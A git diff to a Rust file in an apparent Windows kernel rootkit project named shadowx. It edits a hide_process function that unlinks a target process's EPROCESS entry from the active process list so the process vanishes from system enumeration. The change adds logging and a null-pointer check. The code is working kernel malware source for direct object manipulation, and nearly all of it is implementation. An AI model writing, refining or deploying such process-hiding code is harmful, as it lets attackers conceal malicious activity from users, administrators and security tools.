Update process.rs

shadowx/src/process.rs

@@ -103,42 +103,71 @@ impl Process {
     ///   in the list before it was modified.
     /// * `Err(ShadowError)` - Returns an error if the process lookup fails or the operation encounters an issue.
     pub unsafe fn hide_process(pid: usize) -> Result<LIST_ENTRY> {
+        // Log the start of the process hiding routine.
+        log::info!("Attempting to hide process with PID: {}", pid);
+
         // Getting offsets based on the Windows build number
         let active_process_link = get_active_process_link_offset();
         let offset_lock = get_process_lock();
 
         // Retrieve the EPROCESS structure for the target process
         let process = Self::new(pid)?;
+        log::info!("Found EPROCESS for PID {} at address: {:p}", pid, process.e_process);
 
-        // Retrieve the `LIST_ENTRY` for the active process link, which connects the process
-        // to the list of active processes in the system.
+        // Retrieve the `LIST_ENTRY` for the active process link.
         let current = process.e_process.cast::<u8>().offset(active_process_link) as PLIST_ENTRY;
-        let push_lock = process.e_process.cast::<u8>().offset(offset_lock) as *mut u64;
+        log::info!("Current LIST_ENTRY pointer: {:p}", current);
 
-        // Use synchronization to ensure thread safety while modifying the list
+        // Retrieve the push lock for synchronization.
+        let push_lock = process.e_process.cast::<u8>().offset(offset_lock) as *mut u64;
+        log::info!("Using push lock at: {:p}", push_lock);
+
+        // Use synchronization to ensure thread safety while modifying the list.
         with_push_lock_exclusive(push_lock, || {
+            log::info!("Acquired exclusive push lock for process hiding");
+        
             // The next process in the chain
             let next = (*current).Flink;
-
             // The previous process in the chain
             let previous = (*current).Blink;
-
+        
+            log::info!(
+                "Before unlink: current->Flink = {:p}, current->Blink = {:p}",
+                (*current).Flink, (*current).Blink
+            );
+            log::info!("Neighboring entries: next = {:p}, previous = {:p}", next, previous);
+        
+            // Check if the neighboring pointers are valid before proceeding
+            if next.is_null() || previous.is_null() {
+                log::error!("One or both of the neighboring pointers are null. Aborting unlink operation.");
+                return Err(ShadowError::InvalidListEntry);
+            }
+        
             // Storing the previous list entry, which will be returned
             let previous_link = LIST_ENTRY {
                 Flink: next as *mut LIST_ENTRY,
                 Blink: previous as *mut LIST_ENTRY,
             };
-
+        
             // Unlink the process from the active list
             (*next).Blink = previous;
             (*previous).Flink = next;
-
+            log::info!("Unlinked process from active process list");
+        
             // Make the current list entry point to itself to hide the process
             (*current).Flink = current;
             (*current).Blink = current;
-
+            log::info!("Process LIST_ENTRY modified to point to itself");
+        
+            // Log final state of the current entry
+            log::info!(
+                "Final state of current LIST_ENTRY: Flink = {:p}, Blink = {:p}",
+                (*current).Flink, (*current).Blink
+            );
+        
             Ok(previous_link)
         })
+        
     }
 
     /// Unhides a process by restoring it to the active process list in the operating system.